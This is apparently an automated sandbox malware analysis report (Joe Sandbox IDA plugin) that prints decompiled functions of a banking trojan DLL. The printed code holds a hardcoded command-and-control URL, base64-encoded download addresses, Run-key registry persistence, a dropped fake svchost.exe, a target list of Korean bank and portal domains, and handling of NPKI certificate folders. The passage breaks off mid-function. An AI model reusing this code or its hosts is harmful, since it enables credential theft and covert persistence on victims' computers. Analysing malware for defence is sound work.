Uniqueness Score: -1.00%

Function 10005DB4 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 110
timeCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E10005DB4(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v3;
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v80;
				void _v128;
				void _v383;
				signed char _v384;
				char _v644;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t31;
				void* _t44;
				signed short _t49;
				void* _t54;
				signed int _t59;
				void* _t62;
				void* _t63;
				signed int _t64;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				void* _t74;
				void* _t77;
				intOrPtr _t78;
				char* _t81;
				void* _t88;

				_t88 = __eflags;
				_t70 = __edx;
				_t59 = 0xc;
				_t77 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0";
				_t31 = memcpy( &_v128, _t77, _t59 << 2);
				_t74 = _t77 + _t59 + _t59;
				0x10032624(0x80000002,  &_v128, 0, 0xf003f,  &_v8);
				asm("sbb [ebp-0x72b68a40], al");
				_t81 =  &_v3;
				asm("clc");
				_v16 = 4;
				_v12 = 0xc8;
				E1000409D(_v8, "ProcessorNameString", 0,  &_v16,  &_v644, _t31);
				E10004092(_v8);
				_t78 = _a4;
				_push( &_v644);
				E1000CD0E(0, _t78);
				E100058A4(0, _t78);
				_t13 = _t78 + 0x60; // 0x128
				E10005ACA(_t88, _t13);
				_pop(_t62);
				_v80 = 0x40;
				E1002BB01( &_v80, __ebx, _t62, _t70, _t74, _t78, _t88);
				_t71 = _v68;
				_t63 = 0x14;
				_t44 = E1000CDB0(_v72, _t63, _t71);
				asm("adc edx, 0x0");
				_t18 = _t78 + 0x40; // 0x108
				E10003EF4(_t18, "%u MB", _t44 + 1);
				_t19 = _t78 + 0x80; // 0x148
				_t49 = E1000CD0E(_t63, _t19);
				0x1003e508("12071239", _t71, _t81,  &_v80);
				_v384 = _v384 & 0x00000000;
				 *(_t78 + 0x120) = _t49 & 0x0000ffff;
				_t64 = 0x3f;
				memset( &_v383, 0, _t64 << 2);
				 *(_t78 + 0x124) =  *(_t78 + 0x124) | 0xffffffff;
				asm("stosw");
				asm("stosb");
				_t54 = E10005CF7( &_v384, 0x100);
				_t67 = _t81;
				if(_t54 == 0) {
					__eflags = _t78 + 0xa0;
					return E10003EF4(_t78 + 0xa0, "%s", "http://107.163.56.232:18963/main.php");
				}
				_push( &_v384);
				return E1000CD0E(_t67, _t78 + 0xa0);
			}

APIs

___crtGetTimeFormatEx.LIBCMT ref: 10005E11

Part of subcall function 1000409D: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040B2

Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10006DCF,?), ref: 10004096

Strings

%u MB, xrefs: 10005E7E
http://107.163.56.232:18963/main.php, xrefs: 10005EF8
@, xrefs: 10005E57
12071239, xrefs: 10005E8F
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 10005DC5
ProcessorNameString, xrefs: 10005E02

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: CloseFormatQueryTimeValue___crt
String ID: %u MB$12071239$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.232:18963/main.php
API String ID: 271660946-279254293
Opcode ID: 6e440baeb92706eb6bc7878b631f03b6f2afa9644941370a4253d57c09636d3b
Instruction ID: 4b44d42b6dd2e917ab233586d3a99f6710c87f88ea92407307b6f82172be36f0
Opcode Fuzzy Hash: 6e440baeb92706eb6bc7878b631f03b6f2afa9644941370a4253d57c09636d3b
Instruction Fuzzy Hash: 2531C2B680460CBAFB21C764DC42FDF77BCEB04340F14456AF658BA082EB75BA498B55

Uniqueness

Uniqueness Score: -1.00%

Function 10008578 Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 83
sleepCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10008578(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v32;
				CHAR* _v72;
				void _v76;
				char _v80;
				char _v96;
				void _v355;
				char _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t20;
				void* _t22;
				void* _t24;
				void* _t35;
				void* _t36;
				void* _t38;
				signed int _t39;
				signed int _t41;
				void* _t43;
				void* _t51;
				void* _t57;

				_t57 = __eflags;
				_t43 = __edx;
				_t38 = __ecx;
				Sleep(0x2710);
				_v12 = E10001000(_t38, _t57, __fp0, "aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=");
				_t20 = E1000CCAE(_t19, _t36, _t38, _t43,  *0x1000e0b0, 0x300000, _t51, _t57, __fp0, 0x300000);
				_push(0x300000);
				_push(0);
				_v8 = _t20;
				E1000CCFC(0, _t38, 0x300000, _t51, _t57, _t20);
				_t22 = E100061BD(_t38, 0x300000, _t57, __fp0, _v12, _v8, 0x300000);
				_t50 = _t22;
				if(_t22 <= 0) {
					L1:
					Sleep(0x1b7740);
					goto L1;
				}
				_t39 = 0x40;
				_v356 = 0;
				_t24 = memset( &_v355, 0, _t39 << 2);
				asm("stosw");
				asm("stosb");
				wsprintfA( &_v356, "c:\\%d.log", E1002DBAC(_t24, 0, _t43,  &_v355 + _t39, _t50, __eflags, __fp0));
				E10006840( &_v356, _t43,  &_v356, _v8, _t50);
				__eflags = 0;
				_t41 = 0x10;
				memset( &_v76, 0, _t41 << 2);
				_v80 = 0x44;
				_v72 = "wINsTA0\\dEFauLT";
				_v32 = 0;
				0x10036ac0(_t43, 0,  &_v356, 0, 0, 0, 0, 0, 0,  &_v80,  &_v96, 0);
				_t35 = 1;
				return _t35;
			}

APIs

Sleep.KERNEL32(00002710), ref: 1000858F
Sleep.KERNEL32(001B7740), ref: 100085D0
wsprintfA.USER32 ref: 100085FD

Strings

aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=, xrefs: 10008591
wINsTA0\dEFauLT, xrefs: 1000863D
c:\%d.log, xrefs: 100085F7
D, xrefs: 10008623

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep$wsprintf
String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$c:\%d.log$wINsTA0\dEFauLT
API String ID: 3195947292-2583752392
Opcode ID: 0810fa4d6b71a50b45236c33566878f9762d6c774f759de78f1c08ccf4ee19d6
Instruction ID: 80da11c417ec69a2b6a76b4d39b24a6af7efd0caae81726e88516388cc332cb8
Opcode Fuzzy Hash: 0810fa4d6b71a50b45236c33566878f9762d6c774f759de78f1c08ccf4ee19d6
Instruction Fuzzy Hash: 0E21D5B6C0021CBAEB11EBE4CC42EDFBB7CEF48390F140466F604BA141DA716E458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10006D08 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72
timeCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E10006D08(void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				void _v271;
				char _v272;
				void _v531;
				char _v532;
				void* __esi;
				signed int _t34;
				void* _t50;

				_t50 = __eflags;
				_t34 = 0x40;
				_v532 = 0;
				memset( &_v531, 0, _t34 << 2);
				asm("stosw");
				asm("stosb");
				E10003FF7(0x100166cc,  &_v532, 0x104);
				E1000406C(0x80000001, E10001000(0, _t50, __fp0, "U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg=="), 0, "REG_SZ", 0, 0xf003f, 0,  &_v8,  &_v12);
				_push(0x40);
				_v272 = 0;
				memset( &_v271, 0, 0 << 2);
				asm("stosw");
				asm("stosb");
				wsprintfA( &_v272, "%s \"%s\",Dispatch", 0x100165c8, 0x100166cc);
				_push( &_v272);
				E100040D4(_v8, "Disp", 0, 1,  &_v272, E1000CD02(0, 0x100166cc) + 1);
				return E10004092(_v8);
			}

0x10006d08
0x10006d18
0x10006d21
0x10006d2c
0x10006d2e
0x10006d30
0x10006d3e
0x10006d6c
0x10006d71
0x10006d7c
0x10006d83
0x10006d85
0x10006d87
0x10006d99
0x10006da5
0x10006dbf
0x10006dd4

APIs

Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003

Part of subcall function 1000406C: RegCreateKeyExA.ADVAPI32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D71,?,10006D71,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A

wsprintfA.USER32 ref: 10006D99
___crtGetTimeFormatEx.LIBCMT ref: 10006DBF

Part of subcall function 100040D4: RegSetValueExA.ADVAPI32(00000001,?,00000001,00000000,?,?,?,10006DC4,?,Disp,00000000,00000001,?,00000001,?), ref: 100040E9

Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10006DCF,?), ref: 10004096

Strings

REG_SZ, xrefs: 10006D55
U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 10006D5B
Disp, xrefs: 10006DB7
%s "%s",Dispatch, xrefs: 10006D93

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
String ID: %s "%s",Dispatch$Disp$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==
API String ID: 1762869224-3950432356
Opcode ID: d0f372c4c36c380af209c7183de226d935087aaaefbf66ce19d7085485c3dcb4
Instruction ID: 37d86c3d472a3d605e7482a7a14943cafe3984fcf04a0d8964f0c82a610850ab
Opcode Fuzzy Hash: d0f372c4c36c380af209c7183de226d935087aaaefbf66ce19d7085485c3dcb4
Instruction Fuzzy Hash: 7D11B2B694421CBEFB11D7A4DC86FEA776CDB14344F1404B1F704BA085DAB16FC88AA4

Uniqueness

Uniqueness Score: -1.00%

Function 10005318 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53
libraryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E10005318(void* __ecx, void* __eflags, intOrPtr _a4) {
				void _v4099;
				signed char _v4100;
				signed char* _t20;
				signed char* _t25;
				intOrPtr* _t31;
				signed char* _t32;
				void* _t33;
				void* _t35;

				E1000CD20(0x1000, __ecx);
				_v4100 = _v4100 & 0x00000000;
				_push("www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.co.ki|www.keb.co.kr.ki|www.kfcc.co.kr.ki|www.lottirich.co.ki|www.nlotto.co.ki|www.gmarket.net|nate.com|www.nate.com|daum.com|www.daum.net|daum.net|www.zum.com|zum.com|naver.com|www.nonghyup.com|www.naver.com||www.nate.net|hanmail.net|www.hanmail.net|www.hanacbs.com|kfcc.co.ki|www.kfcc.co.ki|www.daum.net|daum.net|www.kbstir.com|www.nonghuyp.com|www.wooribank.com|www.ibek.co.ki|www.epostbenk.go.ki|www.hanabenk.com|www.keb.co.ki|www.citibank.co.ki|www.citibank.co.kr.ki|www.standardchartered.co.kr.ki|www.standardchartered.co.ki|www.suhyup-bank.com.ki|www.suhyup-bank.com|www.kjbank.com.ki|www.kjbank.com|openbank.cu.co.kr.ki|openbank.cu.co.ki|www.knbank.co.ki|www.knbank.co.kr.ki|www.busanbank.co.kr.ki|www.busanbank.co.ki|www.suhyup-bank.com|www.suhyup-bank.com.ki|www.standardchartered.co.kr.ki|www.nonghuyp.com.ki|");
				memset( &_v4099, 0, 0x3ff << 2);
				asm("stosw");
				asm("stosb");
				E1000CD0E(0,  &_v4100);
				_pop(_t31);
				0x100411b9();
				_t25 =  &_v4100;
				_t20 =  *_t31( &_v4100, 0x7c);
				_t35 = _t33 + 0x1c;
				while(1) {
					_t32 = _t20;
					if(_t32 == 0) {
						break;
					}
					 *_t32 =  *_t32 & 0x00000000;
					E1000CD08(0, _a4);
					E1000CD08(0, _a4);
					E1000CD08(0, _a4);
					E1000CD08(0, _a4);
					_t12 =  &(_t32[1]); // 0x1
					_t25 = _t12;
					_t20 =  *_t31(_t25, 0x7c, "\r\n", _t25, "    ", 0x10016ae0);
					_t35 = _t35 + 0x28;
				}
				return _t20;
			}

APIs

LdrInitializeThunk.NTDLL ref: 1000537D
LdrInitializeThunk.NTDLL ref: 1000538A
LdrInitializeThunk.NTDLL ref: 10005393
LdrInitializeThunk.NTDLL ref: 100053A0

Strings

, xrefs: 10005382
www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c, xrefs: 1000533C

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c
API String ID: 2994545307-230412946
Opcode ID: 0f0ee0e88a780dbc9f243c599f27c9996d1cd9e2b5f38b67b3bf5a9e7d824a77
Instruction ID: c97ba9839e98783193aeac5bdf29b258f442598287bfd32f3df003f3fcbf67da
Opcode Fuzzy Hash: 0f0ee0e88a780dbc9f243c599f27c9996d1cd9e2b5f38b67b3bf5a9e7d824a77
Instruction Fuzzy Hash: 8501B53690421D76EB12E768CC41FDE7F58EF482C1F104476F648AA096D7B5BAC45A90

Uniqueness

Uniqueness Score: -1.00%

Function 10004351 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
sleepCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E10004351(void* __eax, void* __ecx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				void _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t21;
				void* _t23;
				void* _t27;
				signed int _t29;
				void* _t31;
				char* _t38;
				void* _t40;
				void* _t41;
				signed int _t43;
				void* _t48;
				intOrPtr* _t49;
				CHAR** _t52;
				void* _t54;
				intOrPtr* _t55;

				_t60 = __fp0;
				_t47 = __edx;
				_t39 = __ecx;
				_t52 = "cmd.exe";
				0x10032ab5(__eax, _a8, _t52);
				_t59 = __eax;
				if(__eax == 0) {
					__eflags = _a4 - E100267D4(__eax, __ecx, __edx, _t48, _t52, __eflags, __fp0);
					if(__eflags != 0) {
						E10004318(_t19, __ecx, _a4);
						 *_t55 = 0x7d0;
						Sleep(??);
						_t38 = "QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==";
						_t21 = E10001000(_t39, __eflags, __fp0, _t38);
						_pop(_t49);
						0x10041fa9();
						_pop(_t40);
						 *_t49(_t21);
						_t23 = E10001000(_t40, __eflags, __fp0, "QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==");
						_t41 = 1;
						 *_t38(E100271E2(_t24, _t38, _t41, _t47), E10001000(_t41, __eflags, __fp0, _t38), _t23);
						_t27 =  *_t49();
						Sleep(0x3e8);
						_t29 = E100290F2(_t27, _t38, _t54, _a8, _a8) & 0x00000085;
						 *(_t55 + _t29 * 2 - 0x80) =  *(_t55 + _t29 * 2 - 0x80) << 0xa5;
						asm("cld");
						asm("invalid");
						 *_t29 =  *_t29 + 1;
						__eflags =  *_t29;
						_t43 = 0x40;
						__eflags = 0;
						_t31 = memset( &_v263, 0, _t43 << 2);
						asm("stosw");
						asm("stosb");
						0x10041377();
						wsprintfA( &_v264, "%s.%d", _a8, _t31);
						return  *_t38(_a8,  &_v264, 1);
					}
					_push("self");
					L4:
					_push(0);
					return L10004139(_t39, _t47, _t59, _t60);
				}
				_push(_t52);
				goto L4;
			}

APIs

Sleep.KERNEL32(?,00000000,00000000,?,cmd.exe,100168D4,751443E0,00000000), ref: 100043A6
Sleep.KERNEL32(000003E8), ref: 100043E5

Strings

cmd.exe, xrefs: 1000435C, 10004362, 10004370
QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==, xrefs: 100043A8, 100043AD, 100043CB
QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==, xrefs: 100043BF
self, xrefs: 1000437E

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep
String ID: QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==$cmd.exe$self
API String ID: 3472027048-2620343502
Opcode ID: f80a028ce0456d96c9013e9b422283649f837558aaaf319a9c805c80896dde91
Instruction ID: b27527e00d161eb54cfb38a31ab8197fa4e33b6488c85d147b80e3c5571d821e
Opcode Fuzzy Hash: f80a028ce0456d96c9013e9b422283649f837558aaaf319a9c805c80896dde91
Instruction Fuzzy Hash: CF0126B64043547AFA11B778EC86F8F3B4CDF452E1F110422F94469089CEB9AA808665

Uniqueness

Uniqueness Score: -1.00%

Function 10004630 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 102
libraryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E10004630(void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v275;
				char _v276;
				void _v535;
				char _v536;
				char _v812;
				signed char _v856;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t47;
				void* _t53;
				intOrPtr _t57;
				void* _t59;
				signed int _t66;
				signed int _t68;
				void* _t70;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t77;
				void* _t78;
				void* _t80;
				void* _t87;

				_t87 = __fp0;
				_t70 = __edx;
				_t66 = 0x40;
				_v536 = 0;
				memset( &_v535, 0, _t66 << 2);
				asm("stosw");
				asm("stosb");
				E1000CD0E(0,  &_v536);
				E1000CD08(0,  &_v536);
				_t80 = _t78 + 0x1c;
				_t47 =  &_v536;
				0x10031a18(_t47,  &_v856, "\\*.*", _a4);
				asm("insd");
				_v12 = _t47;
				if(_t47 != 0xffffffff) {
					_push(_t75);
					do {
						_t68 = 0x40;
						_t73 =  &_v275;
						_v276 = 0;
						memset(_t73, 0, _t68 << 2);
						_t74 = _t73 + _t68;
						asm("stosw");
						asm("stosb");
						wsprintfA( &_v276, "%s\\%s", _a4,  &_v812);
						_push(_a12);
						_t53 = E1000CD02(0, _t75);
						_t80 = _t80 + 0x20;
						_t75 = _t77 + _t53 - 0x10f;
						if((_v856 & 0x00000010) == 0) {
							_v16 = 0;
							_v8 = 0;
							_t57 = E10004564(0, _t70, __eflags, _t87,  &_v8,  &_v276,  &_v16);
							_t80 = _t80 + 0xc;
							__eflags = _t57;
							if(__eflags == 0) {
								goto L9;
							}
							__eflags = _v8;
							if(__eflags == 0) {
								goto L9;
							}
							E1000CBDC(_a8, _t75, _v8, _v16);
							E1000CCA8(0, 0, _t70, _t74, _t75, _t77, __eflags, _t87, _v8);
							L8:
							_t80 = _t80 + 0x14;
							goto L9;
						}
						_t85 = _v812 - 0x2e;
						if(_v812 == 0x2e) {
							goto L9;
						}
						E1000CBF7(_a8, _t75);
						E10004630(_t70, _t85, _t87,  &_v276, _a8, _a12);
						goto L8;
						L9:
						_push( &_v856);
						_push(_v12);
						_t59 = E100272CF(0, 0, _t70, _t74, _t75, _t77, _t85);
						asm("clc");
					} while (_t59 != 0);
					0x10035c27(_t74, _v12);
					return _t59;
				}
				return _t47;
			}

APIs

LdrInitializeThunk.NTDLL ref: 1000466E
wsprintfA.USER32 ref: 100046C3

Strings

%s\%s, xrefs: 100046BD
\*.*, xrefs: 10004668
., xrefs: 100046E4

Memory Dump Source

Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd

Similarity

API ID: InitializeThunkwsprintf
String ID: %s\%s$.$\*.*
API String ID: 2324811901-2210278135
Opcode ID: d5e4eedee033a2c652017d97775e2094c93dc4010f01f3d435e3a7d7f1b5221c
Instruction ID: d326f81f7ac9fe77124f283db77ffe5160f1302aaf38353be2e3603f90d865f5
Opcode Fuzzy Hash: d5e4eedee033a2c652017d97775e2094c93dc4010f01f3d435e3a7d7f1b5221c
Instruction Fuzzy Hash: F0316FB6C0025CBAEF12DFA4CC45EDE7B7CEB09280F1104A6F618A6051DB319B989B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000800C Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 158
sleepCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E1000800C(void* __eax, char __ebx, void* __ecx, void* __edx, char* __edi, intOrPtr* __esi, void* __fp0) {
				void* _t60;
				int _t61;
				intOrPtr* _t64;
				intOrPtr* _t73;
				intOrPtr _t75;
				void* _t83;
				void* _t91;
				void* _t93;
				intOrPtr _t98;
				char _t102;
				signed int _t106;
				void* _t113;
				void* _t119;
				void* _t122;
				void* _t130;
				intOrPtr* _t131;
				void* _t133;
				void* _t134;
				void* _t141;
				char* _t147;

				_t151 = __fp0;
				_t132 = __esi;
				_t123 = __edi;
				_t122 = __edx;
				_t103 = __ecx;
				_t102 = __ebx;
				 *((intOrPtr*)(__eax - 0x18))();
				asm("cli");
				_push("\\");
				_push(_t133 - 0x294);
				 *__esi();
				_push(_t133 - 0x4ac);
				_push(_t133 - 0x294);
				 *__esi();
				_t60 = _t133 - 0x4ac;
				_push(_t60);
				_push("NPKI");
				_push(_t60);
				_t61 = E100254F0(__ebx, __ecx, __edx, __edi, __esi);
				if(_t61 != 0) {
					_push(_t133 - 0x294);
					L10007F4F(__edx);
					_pop(_t103);
				} else {
					_t106 = 0x3f;
					 *((char*)(_t133 - 0x5d8)) = __ebx;
					memset(_t133 - 0x5d7, _t61, _t106 << 2);
					asm("stosw");
					asm("stosb");
					_push(0x100165b0);
					E10003EF4(_t133 - 0x5d8, "%s\\%s", _t133 - 0x294);
					_push(_t133 - 0x5d8);
					 *((intOrPtr*)(E10022125(_t133 - 0x5d8, __ebx, 0, _t122, __esi, __fp0) - 0xbfffffff)) =  *((intOrPtr*)(E10022125(_t133 - 0x5d8, __ebx, 0, _t122, __esi, __fp0) - 0xbfffffff)) + E10022125(_t133 - 0x5d8, __ebx, 0, _t122, __esi, __fp0) - 0xbfffffff;
					_t73 =  *0x8e85700;
					 *_t73 =  *_t73 + _t73;
					 *((intOrPtr*)(_t133 - 0x10)) = _t73;
					_t75 = E10004770(_t133 - 0x294, 0x850fc085, _t122, _t133 - 0x5d7 + _t106, __fp0, _t133 - 0x294, _t73, _t133 - 0x5d7 + _t106);
					_push(0x1f);
					 *((intOrPtr*)(_t133 - 0xc)) = _t75;
					 *((char*)(_t133 - 0x90)) = _t102;
					memset(_t133 - 0x8f, 0, 0x850fc085 << 2);
					asm("stosw");
					asm("stosb");
					_push(0x1f);
					 *((char*)(_t133 - 0x190)) = _t102;
					memset(_t133 - 0x18f, 0, 0 << 2);
					asm("stosw");
					asm("stosb");
					_t113 = 0x1f;
					_t130 = _t133 - 0x10f;
					 *((char*)(_t133 - 0x110)) = _t102;
					memset(_t130, 0, 0 << 2);
					_t131 = _t130 + _t113;
					asm("stosw");
					asm("stosb");
					 *((intOrPtr*)(_t133 - 8)) = 0x50;
					_t83 = E10005C4C(_t133 - 0x110, 0x80);
					_t141 = _t134 + 0x1c - 1 + 0x3c;
					if(_t83 == 0) {
						_push( &M1001258F);
					} else {
						_push(_t133 - 0x109);
					}
					E1000CD0E(0, _t133 - 0x90);
					0x1003775b();
					_push(0x2f);
					_push(_t133 - 0x90);
					if( *_t131() != 0) {
						 *((char*)( *_t131(_t133 - 0x90, 0x2f))) = _t102;
					}
					_t123 =  *_t131(_t133 - 0x90, 0x3a);
					_pop(_t119);
					if(_t123 != _t102) {
						 *_t123 = _t102;
						_t98 = E1000CD0E(_t119, _t133 - 0x190);
						_t123 = _t123 + 1;
						_t147 = _t123;
						0x100354a4(_t122, _t123, _t133 - 0x90);
						_t141 = _t141 + 0xc;
						 *((intOrPtr*)(_t133 - 8)) = _t98;
					}
					_push( *((intOrPtr*)(_t133 - 0xc)));
					_push( *((intOrPtr*)(_t133 - 0x10)));
					_push( *((intOrPtr*)(_t133 - 8)));
					_t91 = E10001000(_t119, _t147, _t151, "L2ltYWdlLnBocA==");
					_pop(_t103);
					_push(_t91);
					_push(_t133 - 0x190);
					_t93 = E10007E03(_t102, _t103, _t123, _t132, _t147, _t151);
					_t134 = _t141 + 0x14;
					_t148 = _t93;
					if(_t93 != 0) {
						_push(_t102);
